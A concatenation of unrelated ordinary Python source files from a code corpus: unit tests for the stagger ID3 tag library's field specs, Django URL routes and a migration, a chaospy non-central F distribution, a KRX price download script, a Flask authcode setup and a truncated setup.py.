from stagger.specs import NullTerminatedStringSpec, URLStringSpec, EncodingSpec
from stagger.specs import EncodedStringSpec, SequenceSpec, MultiSpec, ASPISpec
from stagger.specs import PictureTypeSpec
class SpecTestCase(unittest.TestCase):
def testByteSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = ByteSpec("test")
# spec.read
self.assertEqual(spec.read(frame, b"\x01\x02"), (1, b"\x02"))
self.assertEqual(spec.read(frame, b"\x01"), (1, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
# spec.write
self.assertEqual(spec.write(frame, 5), b"\x05")
# spec.validate
self.assertEqual(spec.validate(frame, 5), 5)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertRaises(ValueError, spec.validate, frame, 256)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testIntegerSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = IntegerSpec("test", 16)
# spec.read
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
self.assertEqual(spec.read(frame, b"\x01\x02"), (258, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
# spec.write
self.assertEqual(spec.write(frame, 1), b"\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x01\x02")
# spec.validate
self.assertEqual(spec.validate(frame, 5), 5)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertRaises(ValueError, spec.validate, frame, 65537)
self.assertRaises(ValueError, spec.validate, frame, 65536)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
# Now try specifying an indirect width
spec = IntegerSpec("test", "bits")
# spec.read
frame.bits = 8
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(1, b"\x02\x03\x04"))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertEqual(spec.read(frame, b"\x01"), (1, b""))
frame.bits = 16
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
# spec.write
frame.bits = 8
self.assertEqual(spec.write(frame, 1), b"\x01")
self.assertRaises(ValueError, spec.write, frame, 258)
frame.bits = 16
self.assertEqual(spec.write(frame, 1), b"\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x01\x02")
# spec.validate
frame.bits = 8
self.assertEqual(spec.validate(frame, 5), 5)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertRaises(ValueError, spec.validate, frame, 256)
self.assertRaises(ValueError, spec.validate, frame, 65536)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
frame.bits = 16
self.assertEqual(spec.validate(frame, 5), 5)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertEqual(spec.validate(frame, 256), 256)
self.assertRaises(ValueError, spec.validate, frame, 65536)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testSignedIntegerSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = SignedIntegerSpec("test", 16)
# spec.read
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
self.assertEqual(spec.read(frame, b"\x01\x02"), (258, b""))
self.assertEqual(spec.read(frame, b"\xFF\xFF"), (-1, b""))
self.assertEqual(spec.read(frame, b"\x80\x00"), (-32768, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
# spec.write
self.assertEqual(spec.write(frame, 1), b"\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x01\x02")
self.assertEqual(spec.write(frame, -1), b"\xFF\xFF")
self.assertEqual(spec.write(frame, -2), b"\xFF\xFE")
self.assertEqual(spec.write(frame, -32768), b"\x80\x00")
# spec.validate
self.assertEqual(spec.validate(frame, 5), 5)
self.assertEqual(spec.validate(frame, -1), -1)
self.assertEqual(spec.validate(frame, 32767), 32767)
self.assertEqual(spec.validate(frame, -32768), -32768)
self.assertRaises(ValueError, spec.validate, frame, 32768)
self.assertRaises(ValueError, spec.validate, frame, -32769)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testRVADIntegerSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = RVADIntegerSpec("test", "bits", signbit=4)
frame.signs = 0
frame.bits = 16
# spec.read
frame.signs = 255
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
frame.signs = 16
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
frame.signs = 0
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(-258, b"\x03\x04"))
frame.signs = 239
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(-258, b"\x03\x04"))
frame.signs = 255
self.assertEqual(spec.read(frame, b"\x01\x02"), (258, b""))
self.assertEqual(spec.read(frame, b"\xFF\xFF"), (65535, b""))
self.assertEqual(spec.read(frame, b"\x80\x00"), (32768, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
frame.signs = 0
self.assertEqual(spec.read(frame, b"\x01\x02"), (-258, b""))
self.assertEqual(spec.read(frame, b"\xFF\xFF"), (-65535, b""))
self.assertEqual(spec.read(frame, b"\x80\x00"), (-32768, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
# spec.write
frame.signs = 0
self.assertEqual(spec.write(frame, 1), b"\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x01\x02")
self.assertEqual(spec.write(frame, 32768), b"\x80\x00")
self.assertEqual(frame.signs, 0) # Write shouldn't update signs
self.assertEqual(spec.write(frame, -1), b"\x00\x01")
self.assertEqual(spec.write(frame, -258), b"\x01\x02")
self.assertEqual(spec.write(frame, -32768), b"\x80\x00")
self.assertEqual(frame.signs, 0)
# spec.validate
frame.signs = 0
self.assertEqual(spec.validate(frame, 5), 5)
self.assertEqual(frame.signs, 16) # Validate updates signs
frame.signs = 0
self.assertEqual(spec.validate(frame, -1), -1)
self.assertEqual(frame.signs, 0)
frame.signs = 0
self.assertEqual(spec.validate(frame, 65535), 65535)
self.assertEqual(frame.signs, 16)
frame.signs = 0
self.assertEqual(spec.validate(frame, -65535), -65535)
self.assertEqual(frame.signs, 0)
frame.signs = 0
self.assertRaises(ValueError, spec.validate, frame, 65536)
self.assertEqual(frame.signs, 16)
frame.signs = 0
self.assertRaises(ValueError, spec.validate, frame, -65536)
self.assertEqual(frame.signs, 0)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testVarIntSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = VarIntSpec("test")
# spec.read
self.assertEqual(spec.read(frame, b"\x10\x01\x02\x03"), (258, b"\x03"))
self.assertEqual(spec.read(frame, b"\x10\xFF\xFF"), (65535, b""))
self.assertEqual(spec.read(frame, b"\x08\x05"), (5, b""))
self.assertEqual(spec.read(frame, b"\x01\x05"), (5, b""))
self.assertEqual(spec.read(frame, b"\x02\x05"), (5, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x08")
self.assertRaises(EOFError, spec.read, frame, b"\x10\x01")
# spec.write
self.assertEqual(spec.write(frame, 0), b"\x20\x00\x00\x00\x00")
self.assertEqual(spec.write(frame, 1), b"\x20\x00\x00\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x20\x00\x00\x01\x02")
self.assertEqual(spec.write(frame, 1 << 32),
b"\x40\x00\x00\x00\x01\x00\x00\x00\x00")
# spec.validate
self.assertEqual(spec.validate(frame, 5), 5)
self.assertEqual(spec.validate(frame, 1 << 32), 1 << 32)
self.assertEqual(spec.validate(frame, 1 << 64 + 3), 1 << 64 + 3)
self.assertRaises(ValueError, spec.validate, frame, -32769)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testBinaryDataSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = BinaryDataSpec("test")
# spec.read
self.assertEqual(spec.read(frame, b""), (b"", b""))
self.assertEqual(spec.read(frame, b"\x01"), (b"\x01", b""))
self.assertEqual(spec.read(frame, bytes(range(100))),
(bytes(range(100)), b""))
# spec.write
self.assertEqual(spec.write(frame, b""), b"")
self.assertEqual(spec.write(frame, b"\x01\x02"), b"\x01\x02")
self.assertEqual(spec.write(frame, bytes(range(100))),
bytes(range(100)))
# spec.validate
self.assertEqual(spec.validate(frame, b""), b"")
self.assertEqual(spec.validate(frame, b"12"), b"12")
self.assertRaises(TypeError, spec.validate, frame, 1)
self.assertRaises(TypeError, spec.validate, frame, [1, 2])
self.assertRaises(TypeError, spec.validate, frame, "foobar")
    def testSimpleStringSpec(self):
        """SimpleStringSpec: a fixed-width (here 6-byte) Latin-1 string."""
        frame = TextFrame(frameid="TEST", encoding=3)
        spec = SimpleStringSpec("test", 6)
        # spec.read: exactly six bytes are consumed; anything after is returned.
        self.assertEqual(spec.read(frame, b"Foobar"), ("Foobar", b""))
        self.assertEqual(spec.read(frame, b"Foobarbaz"), ("Foobar", b"baz"))
        # Latin-1 bytes decode to the matching U+00xx code points.
        self.assertEqual(spec.read(frame, b"F\xF6\xF8b\xE1r"),
                         ("F\u00F6\u00F8b\u00E1r", b""))
        # spec.write: encodes back to Latin-1 with no terminator or padding shown here.
        self.assertEqual(spec.write(frame, "Foobar"), b"Foobar")
        self.assertEqual(spec.write(
            frame, "F\u00F6\u00F8b\u00E1r"), b"F\xF6\xF8b\xE1r")
        # spec.validate: only str that is Latin-1 encodable is accepted.
        self.assertEqual(spec.validate(frame, "Foobar"), "Foobar")
        self.assertEqual(spec.validate(
            frame, "F\u00F6\u00F8b\u00E1r"), "F\u00F6\u00F8b\u00E1r")
        self.assertRaises(TypeError, spec.validate, frame, 1)
        self.assertRaises(TypeError, spec.validate, frame, [1, 2])
        self.assertRaises(TypeError, spec.validate, frame, b"foobar")
        # U+2011 (non-breaking hyphen) has no Latin-1 encoding.
        self.assertRaises(UnicodeEncodeError, spec.validate,
                          frame, "\u2011oobar")
    def nullstringhelper(self, frame, spec):
        """Assertions shared by the NUL-terminated string spec tests.

        Covers the read/write/validate behaviour common to
        NullTerminatedStringSpec and URLStringSpec (Latin-1 data).
        """
        # spec.read: consume up to the first NUL (or end of data); the
        # terminator itself is dropped from both value and remainder.
        self.assertEqual(spec.read(frame, b""), ("", b""))
        self.assertEqual(spec.read(frame, b"\x00"), ("", b""))
        self.assertEqual(spec.read(frame, b"Foo"), ("Foo", b""))
        self.assertEqual(spec.read(frame, b"Foo\x00"), ("Foo", b""))
        self.assertEqual(spec.read(frame, b"Foo\x00Bar"), ("Foo", b"Bar"))
        self.assertEqual(spec.read(frame, b"F\xF6\xF8b\xE1r\x00Bar"),
                         ("F\u00F6\u00F8b\u00E1r", b"Bar"))
        # spec.write: appends the NUL terminator.
        self.assertEqual(spec.write(frame, "Foobar"), b"Foobar\x00")
        self.assertEqual(spec.write(
            frame, "F\u00F6\u00F8b\u00E1r"), b"F\xF6\xF8b\xE1r\x00")
        # spec.validate: only Latin-1 encodable str is accepted.
        self.assertEqual(spec.validate(frame, "Foobar"), "Foobar")
        self.assertEqual(spec.validate(
            frame, "F\u00F6\u00F8b\u00E1r"), "F\u00F6\u00F8b\u00E1r")
        self.assertRaises(TypeError, spec.validate, frame, 1)
        self.assertRaises(TypeError, spec.validate, frame, [1, 2])
        self.assertRaises(TypeError, spec.validate, frame, b"foobar")
        # U+2011 cannot be encoded as Latin-1.
        self.assertRaises(UnicodeEncodeError, spec.validate,
                          frame, "\u2011oobar")
    def testNullTerminatedStringSpec(self):
        """NUL-terminated strings: only the first terminator is consumed."""
        frame = TextFrame(frameid="TEST", encoding=3)
        spec = NullTerminatedStringSpec("test")
        self.nullstringhelper(frame, spec)
        # Everything after the first NUL — including further NULs — stays in
        # the remainder for the next spec to read.
        self.assertEqual(spec.read(frame, b"\x00\x00"), ("", b"\x00"))
        self.assertEqual(spec.read(frame, b"Foo\x00\x00"), ("Foo", b"\x00"))
        self.assertEqual(spec.read(frame, b"Foo\x00Bar\x00"),
                         ("Foo", b"Bar\x00"))
        self.assertEqual(spec.read(frame, b"\x00Bar\x00"), ("", b"Bar\x00"))
    def testURLStringSpec(self):
        """URL strings: NUL-terminated, but empty leading chunks are skipped."""
        frame = TextFrame(frameid="TEST", encoding=3)
        spec = URLStringSpec("test")
        self.nullstringhelper(frame, spec)
        # These four cases show the skipping behaviour: a leading NUL does not
        # produce an empty URL — the following chunk is returned instead.
        self.assertEqual(spec.read(frame, b"\x00\x00"), ("", b""))
        self.assertEqual(spec.read(frame, b"Foo\x00\x00"), ("Foo", b"\x00"))
        self.assertEqual(spec.read(frame, b"Foo\x00Bar\x00"),
                         ("Foo", b"Bar\x00"))
        self.assertEqual(spec.read(frame, b"\x00Bar\x00"), ("Bar", b""))
    def testEncodingSpec(self):
        """EncodingSpec: the single text-encoding byte (valid values 0-3)."""
        frame = TextFrame(frameid="TEST", encoding=3)
        spec = EncodingSpec("test")
        # spec.read: exactly one byte; values above 3 are a FrameError.
        self.assertEqual(spec.read(frame, b"\x01\x02"), (1, b"\x02"))
        self.assertEqual(spec.read(frame, b"\x01"), (1, b""))
        self.assertRaises(EOFError, spec.read, frame, b"")
        self.assertRaises(FrameError, spec.read, frame, b"\x04")
        # spec.write
        self.assertEqual(spec.write(frame, 3), b"\x03")
        # spec.validate: accepts the numeric index or an encoding name
        # (case/punctuation-insensitive), normalized to the index.
        self.assertEqual(spec.validate(frame, 3), 3)
        self.assertEqual(spec.validate(frame, "utf8"), 3)
        self.assertEqual(spec.validate(frame, "UTF-8"), 3)
        self.assertRaises(ValueError, spec.validate, frame, -1)
        self.assertRaises(ValueError, spec.validate, frame, 4)
        self.assertRaises(ValueError, spec.validate, frame, "foobar")
        self.assertRaises(TypeError, spec.validate, frame, 1.5)
    def testEncodedStringSpec(self):
        """EncodedStringSpec: terminated string in the frame's current encoding.

        Note the assertions below mutate ``frame.encoding`` as they go; the
        order of the sections matters.
        """
        frame = TextFrame(frameid="TEST", encoding=3)
        spec = EncodedStringSpec("test")
        # spec.read with a one-byte encoding: NUL-terminated or runs to the end.
        self.assertEqual(spec.read(frame, b""), ("", b""))
        self.assertEqual(spec.read(frame, b"Foo"), ("Foo", b""))
        self.assertEqual(spec.read(frame, b"Foobar\x00"), ("Foobar", b""))
        self.assertEqual(spec.read(frame, b"\x00Foobar"), ("", b"Foobar"))
        # Two-byte encoding: the terminator is a NUL *pair*.
        frame.encoding = "utf-16-be"
        self.assertEqual(spec.read(frame, b"\x00F\x00o\x00o"), ("Foo", b""))
        self.assertEqual(
            spec.read(frame, b"\x00F\x00o\x00o\x00\x00"), ("Foo", b""))
        self.assertEqual(
            spec.read(frame, b"\x00F\x01\x00\x00a"), ("F\u0100a", b""))
        # Broken terminal character
        self.assertRaises(EOFError, spec.read, frame, b"\x00F\x00")
        # spec.write: encodes and appends the encoding-sized terminator.
        frame.encoding = "latin-1"
        self.assertEqual(spec.write(frame, ""), b"\x00")
        self.assertEqual(spec.write(frame, "Foobar"), b"Foobar\x00")
        self.assertRaises(UnicodeEncodeError, spec.write, frame, "\u0100")
        frame.encoding = "utf-8"
        self.assertEqual(spec.write(frame, ""), b"\x00")
        self.assertEqual(spec.write(frame, "Foobar"), b"Foobar\x00")
        self.assertEqual(spec.write(frame, "\u0100"), b"\xC4\x80\x00")
        # Plain "utf-16" may emit either byte-order mark, so accept both forms.
        frame.encoding = "utf-16"
        self.assertTrue(spec.write(frame, "") in [
            b"\xFE\xFF\x00\x00", b"\xFF\xFE\x00\x00"])
        self.assertTrue(spec.write(frame, "B") in [
            b"\xFE\xFF\x00B\x00\x00", b"\xFF\xFEB\x00\x00\x00"])
        frame.encoding = "utf-16-be"
        self.assertEqual(spec.write(frame, ""), b"\x00\x00")
        self.assertEqual(spec.write(frame, "B"), b"\x00B\x00\x00")
        # spec.validate behaves the same across all four encodings...
        for encoding in ["latin-1", "utf-16", "utf-16-be", "utf-8"]:
            frame.encoding = encoding
            self.assertEqual(spec.validate(frame, ""), "")
            self.assertEqual(spec.validate(frame, "foo"), "foo")
            self.assertEqual(spec.validate(frame, "\xF0"), "\xF0")
            self.assertRaises(TypeError, spec.validate, frame, -1)
            self.assertRaises(TypeError, spec.validate, frame, 4)
            self.assertRaises(TypeError, spec.validate, frame, 3.4)
        # ...except that Latin-1 additionally rejects unencodable characters.
        frame.encoding = "latin-1"
        self.assertRaises(UnicodeEncodeError, spec.validate, frame, "\u0100")
    def testSequenceSpec(self):
        """SequenceSpec: repeats its subspec until the data runs out."""
        # A bare object() works as the frame here, so the wrapped subspec
        # evidently never consults frame state in these cases.
        frame = object()
        spec = SequenceSpec("test", NullTerminatedStringSpec("text"))
        # spec.read: returns a list of decoded values; remainder is always empty.
        self.assertEqual(spec.read(frame, b""), ([], b""))
        self.assertEqual(spec.read(frame, b"Foo"), (["Foo"], b""))
        self.assertEqual(spec.read(frame, b"Foo\x00Bar\x00"),
                         (["Foo", "Bar"], b""))
        self.assertEqual(spec.read(frame, b"\x00Foobar"),
                         (["", "Foobar"], b""))
        self.assertEqual(spec.read(frame, b"\x00" * 10), ([""] * 10, b""))
        # spec.write: accepts a single value or a list of values.
        self.assertEqual(spec.write(frame, ""), b"\x00")
        self.assertEqual(spec.write(frame, "Foobar"), b"Foobar\x00")
        self.assertEqual(spec.write(frame, [""] * 10), b"\x00" * 10)
        self.assertEqual(spec.write(frame, ["Foo"] * 10), b"Foo\x00" * 10)
        # spec.validate: single values are wrapped into a one-element list.
        self.assertEqual(spec.validate(frame, ""), [""])
        self.assertEqual(spec.validate(frame, [""]), [""])
        self.assertEqual(spec.validate(frame, "foo"), ["foo"])
        self.assertEqual(spec.validate(frame, ["foo"]), ["foo"])
        self.assertEqual(spec.validate(frame, ["foo"] * 10), ["foo"] * 10)
        self.assertRaises(TypeError, spec.validate, frame, -1)
        self.assertRaises(TypeError, spec.validate, frame, 4)
        self.assertRaises(TypeError, spec.validate, frame, 3.4)
    def testMultiSpec(self):
        """MultiSpec: repeating groups of several subspecs, read as tuples."""
        frame = TextFrame(frameid="TEST", encoding=3)
        # Each group here is a NUL-terminated string followed by a 16-bit int.
        spec = MultiSpec("test",
                         NullTerminatedStringSpec("text"),
                         IntegerSpec("value", 16))
        # spec.read: whole groups only — a partial group raises EOFError.
        self.assertEqual(spec.read(frame, b""), ([], b""))
        self.assertRaises(EOFError, spec.read, frame, b"Foo")
        self.assertEqual(spec.read(frame, b"Foo\x00\x01\x02"),
                         ([("Foo", 258)], b""))
        self.assertEqual(spec.read(frame, b"Foo\x00\x01\x02Bar\x00\x02\x03"),
                         ([("Foo", 258), ("Bar", 515)], b""))
        self.assertEqual(spec.read(frame, b"\x00\x01\x02Foobar\x00\x02\x03"),
                         ([("", 258), ("Foobar", 515)], b""))
        # spec.write: serializes each group in order.
        self.assertEqual(spec.write(frame, []), b"")
        self.assertEqual(spec.write(frame, [("Foo", 1)]), b"Foo\x00\x00\x01")
        self.assertEqual(spec.write(frame, [("Foo", 1), ("Bar", 2)]),
                         b"Foo\x00\x00\x01Bar\x00\x00\x02")
        self.assertEqual(spec.write(frame, [("Foo", 1), ("Bar", 2)] * 10),
                         b"Foo\x00\x00\x01Bar\x00\x00\x02" * 10)
        # spec.validate: lists are normalized to tuples; wrong arity is a ValueError.
        self.assertEqual(spec.validate(frame, []), [])
        self.assertEqual(spec.validate(
            frame, [["Foo", 1]] * 10), [("Foo", 1)] * 10)
        self.assertRaises(TypeError, spec.validate, frame, 1)
        self.assertRaises(TypeError, spec.validate, frame, "foo")
        self.assertRaises(ValueError, spec.validate, frame, [["Foo", 2, 2]])
    def testASPISpec(self):
        """ASPISpec: fixed-count list of N integers, each b bytes wide.

        The spec reads its dimensions from the frame (``frame.b`` = bytes per
        entry, ``frame.N`` = number of entries), so the attribute assignments
        between sections below are part of the test.
        """
        frame = TextFrame(frameid="TEST", encoding=3)
        spec = ASPISpec("test")
        # spec.read: N one-byte entries...
        frame.b = 1
        frame.N = 5
        self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04\x05\x06\x07"),
                         ([1, 2, 3, 4, 5], b"\x06\x07"))
        self.assertRaises(EOFError, spec.read, frame, b"\x01\x02")
        # ...or N big-endian two-byte entries.
        frame.b = 2
        frame.N = 2
        self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04\x05\x06\x07"),
                         ([258, 772], b"\x05\x06\x07"))
        self.assertRaises(EOFError, spec.read, frame, b"\x01\x02\x03")
        # spec.write: entry width follows frame.b.
        frame.b = 1
        frame.N = 4
        self.assertEqual(spec.write(frame, [1, 2, 3, 4]), b"\x01\x02\x03\x04")
        frame.b = 2
        self.assertEqual(spec.write(
            frame, [1, 2, 3, 4]), b"\x00\x01\x00\x02\x00\x03\x00\x04")
        # spec.validate: requires exactly N entries; bytes input is unpacked.
        frame.N = 4
        frame.b = 1
        self.assertRaises(ValueError, spec.validate, frame, [])
        self.assertEqual(spec.validate(frame, [1, 2, 3, 4]), [1, 2, 3, 4])
        self.assertEqual(spec.validate(
            frame, b"\x01\x02\x03\x04"), [1, 2, 3, 4])
        self.assertRaises(TypeError, spec.validate, frame, 1)
        self.assertRaises(TypeError, spec.validate, frame, "1234")
        self.assertRaises(ValueError, spec.validate, frame, [1, 2, 3])
        self.assertRaises(ValueError, spec.validate, frame, [1, 2, 3, 4, 5])
    def testPictureTypeSpec(self):
        """PictureTypeSpec: the APIC picture-type byte."""
        frame = TextFrame(frameid="TEST", encoding=3)
        spec = PictureTypeSpec("test")
        # spec.read: a single byte.
        self.assertEqual(spec.read(frame, b"\x01\x02"), (1, b"\x02"))
        self.assertEqual(spec.read(frame, b"\x01"), (1, b""))
        self.assertRaises(EOFError, spec.read, frame, b"")
        # spec.write
        self.assertEqual(spec.write(frame, 3), b"\x03")
        # spec.validate: accepts the numeric type or its name
        # (case-insensitive, e.g. "Front Cover" == 3); valid range is 0-20.
        self.assertEqual(spec.validate(frame, 3), 3)
        self.assertEqual(spec.validate(frame, "Front Cover"), 3)
        self.assertEqual(spec.validate(frame, "front cover"), 3)
        self.assertRaises(ValueError, spec.validate, frame, -1)
        self.assertRaises(ValueError, spec.validate, frame, 21)
        self.assertRaises(ValueError, spec.validate, frame, "foobar")
        self.assertRaises(TypeError, spec.validate, frame, 1.5)
# Expose the tests as a module-level suite so unittest.main(defaultTest="suite")
# below (and external runners) can find them.
suite = unittest.TestLoader().loadTestsFromTestCase(SpecTestCase)
if __name__ == "__main__":
    # Show every warning during a test run rather than the default once-per-location filter.
    warnings.simplefilter("always", Warning)
    unittest.main(defaultTest="suite")
| StarcoderdataPython |
3387495 | from django.urls import path
from . import views
# URL routes for the profile app: profile/avatar pages, messaging,
# personal records CRUD, and search/listing views.
urlpatterns = [
    # Profile and avatar.
    path('', views.ProfileView.as_view(), name="profile"),
    path('edit-avatar/', views.ProfileEditView.as_view(), name="edit-avatar"),
    # Messaging.
    path('messages/', views.MessagesList.as_view(), name="messages"),
    path('create-message/', views.Rooms.as_view(), name="create_message"),
    path('message/<int:pk>/', views.DetailMessages.as_view(), name="detail_message"),
    # Public user pages.
    path('user/<int:pk>/', views.PublicUserInfo.as_view(), name="public_profile"),
    path('all-users/', views.AllUserProfile.as_view(), name="all_profiles"),
    # Personal records CRUD.
    path('records/<int:pk>/', views.PersonalRecordsList.as_view(), name="personal_records"),
    # path('notes/<int:pk>/', views.PublicPersonalRecordsList.as_view(), name="profile_records"),
    path('user/<int:pk>/add-record/', views.PersonalRecordsCreate.as_view(), name="add_record"),
    path('records-update/<int:pk>/', views.PersonalRecordsUpdate.as_view(), name="update_records"),
    path('record/<int:pk>/', views.PersonalRecordsDetail.as_view(), name="detail_record"),
    path('delete/<int:pk>/', views.PersonalRecordsDelete.as_view(), name="delete_record"),
    # Listings, search and account management.
    path('sorted/', views.SortedPersonalRecords.as_view(), name="sorted_record"),
    path('search-user/', views.SearchUser.as_view(), name="search_user"),
    path('public-records/', views.AllRecordsOfUsers.as_view(), name="public_records"),
    path('edit/', views.PasswordChangeView.as_view(), name="password_edit"),
    # api
    # path('', api_views.MyProfile.as_view()),
    # path('me/', api_views.AboutMe.as_view()),
]
| StarcoderdataPython |
1622645 | """(Non-central) F distribution."""
import numpy
from scipy import special
from ..baseclass import Dist
from ..operators.addition import Add
class f(Dist):
    """Raw (unshifted, unscaled) non-central F distribution.

    Dist parameters:
        dfn: degrees of freedom of the numerator.
        dfd: degrees of freedom of the denominator.
        nc: non-centrality parameter.

    The public ``F`` class below wraps this in an affine (scale/shift) transform.
    """
    def __init__(self, dfn, dfd, nc):
        Dist.__init__(self, dfn=dfn, dfd=dfd, nc=nc)
    def _pdf(self, x, dfn, dfd, nc):
        n1, n2 = dfn, dfd
        # Work on the log scale first: non-centrality tilt plus gamma-function terms.
        term = -nc/2.+nc*n1*x/(2*(n2+n1*x)) + special.gammaln(n1/2.)+special.gammaln(1+n2/2.)
        term -= special.gammaln((n1+n2)/2.)
        Px = numpy.exp(term)
        Px *= n1**(n1/2.) * n2**(n2/2.) * x**(n1/2.-1)
        Px *= (n2+n1*x)**(-(n1+n2)/2.)
        # Non-central correction factor via an associated Laguerre polynomial.
        Px *= special.assoc_laguerre(-nc*n1*x/(2.*(n2+n1*x)), n2/2., n1/2.-1)
        Px /= special.beta(n1/2., n2/2.)
        return Px
    def _cdf(self, x, dfn, dfd, nc):
        # Delegate to scipy's non-central F CDF.
        return special.ncfdtr(dfn, dfd, nc, x)
    def _ppf(self, q, dfn, dfd, nc):
        # Inverse CDF (quantile function), also from scipy.
        return special.ncfdtri(dfn, dfd, nc, q)
    def _bnd(self, x, dfn, dfd, nc):
        # Support is [0, inf); use the 1 - 1e-10 quantile as a finite upper bound.
        return 0.0, self._ppf(1-1e-10, dfn, dfd, nc)
class F(Add):
    """
    (Non-central) F or Fisher-Snedecor distribution.

    Args:
        n (float, Dist) : Degres of freedom for numerator
        m (float, Dist) : Degres of freedom for denominator
        scale (float, Dist) : Scaling parameter
        shift (float, Dist) : Location parameter
        nc (float, Dist) : Non-centrality parameter

    Examples:
        >>> distribution = chaospy.F(3, 3, 2, 1, 1)
        >>> print(distribution)
        F(m=3, n=3, nc=1, scale=2, shift=1)
        >>> q = numpy.linspace(0, 1, 6)[1:-1]
        >>> print(numpy.around(distribution.inv(q), 4))
        [1.9336 2.9751 4.7028 8.8521]
        >>> print(numpy.around(distribution.fwd(distribution.inv(q)), 4))
        [0.2 0.4 0.6 0.8]
        >>> print(numpy.around(distribution.pdf(distribution.inv(q)), 4))
        [0.2277 0.1572 0.0837 0.027 ]
        >>> print(numpy.around(distribution.sample(4), 4))
        [ 5.4212  1.5739 25.7656  3.5586]
        >>> print(distribution.mom(1) > 10**8) # undefined
        True
    """
    def __init__(self, n=1, m=1, scale=1, shift=0, nc=0):
        # Kept for __str__/repr output shown in the doctest above.
        self._repr = {"n": n, "m": m, "scale": scale, "shift": shift, "nc": nc}
        # Affine transform of the raw distribution: shift + scale * f(n, m, nc).
        Add.__init__(self, left=f(n, m, nc)*scale, right=shift)
| StarcoderdataPython |
4800985 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
#-*- coding:utf-8 -*-
from commonTool import *
from config import *
import sys
# In[ ]:
# In[2]:
# Daily KRX price dumps are written under <raw output>/priceDaily/.
outputDirPath = outputRawPath + 'priceDaily' + os.path.sep
mkdir(outputDirPath)
# In[ ]:
# In[3]:
# Default to today's date; the commented line was used to re-run yesterday's dump.
d = dt.datetime.today()
# d = d - dt.timedelta(days=1)
dayNo = d.strftime('%Y%m%d')
# An explicit YYYYMMDD command-line argument overrides the default date.
if len(sys.argv) >= 2:
    dayNo = sys.argv[1]
writeDailyPriceFromKRX(dayNo, outputDirPath)
# In[ ]:
| StarcoderdataPython |
1622988 | # Generated by Django 3.1.1 on 2021-04-23 01:19
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: rename the user FK fields on the declaraciones models."""
    dependencies = [
        ('listo_api', '0014_auto_20210422_1904'),
    ]
    operations = [
        # declaraciones.user_related -> users_declaraciones
        migrations.RenameField(
            model_name='declaraciones',
            old_name='user_related',
            new_name='users_declaraciones',
        ),
        # declaracionesdiots.users_related -> users_declaracionesdiots
        migrations.RenameField(
            model_name='declaracionesdiots',
            old_name='users_related',
            new_name='users_declaracionesdiots',
        ),
    ]
| StarcoderdataPython |
3207806 | import json
# Load the JSON document and print each entry under the "colors" key.
# BUG FIX: the original ended with `f.close` (an attribute access, not a call),
# so the file handle was never actually closed. A `with` block closes it
# deterministically even if json.load raises.
with open("data.json") as f:
    data = json.load(f)
for color in data["colors"]:
    print(color)
| StarcoderdataPython |
3246558 | <reponame>lucuma/vd-flask
# coding=utf-8
from authcode import Auth, setup_for_flask
from .. import config
from ..app import app
from ..database import db
from ..models.user_mixin import UserMixin
from .helpers import send_auth_email
# Single authcode Auth instance wired to this app's database and user mixin;
# extra options come from the project config.
auth = Auth(config.SECRET_KEY, db=db, UserMixin=UserMixin, roles=True,
            **config.AUTH_SETTINGS)
# Re-export the ORM models authcode generates, for convenient importing.
User = auth.User
Role = auth.Role
# Register authcode's routes/views on the Flask app; emails go through our helper.
setup_for_flask(auth, app, send_email=send_auth_email)
| StarcoderdataPython |
3361304 | <filename>setup.py<gh_stars>1-10
from schroot import __appname__, __version__
from setuptools import setup
# No README is bundled; the long description is intentionally empty.
long_description = ""
setup(
    # Name and version come from the package itself so they stay in sync.
    name=__appname__,
    version=__version__,
    scripts=[],
    packages=[
        'schroot',
    ],
    author="<NAME>",
    author_email="<EMAIL>",
    long_description=long_description,
    description='schroot chroot schroots!',
    license="Expat",
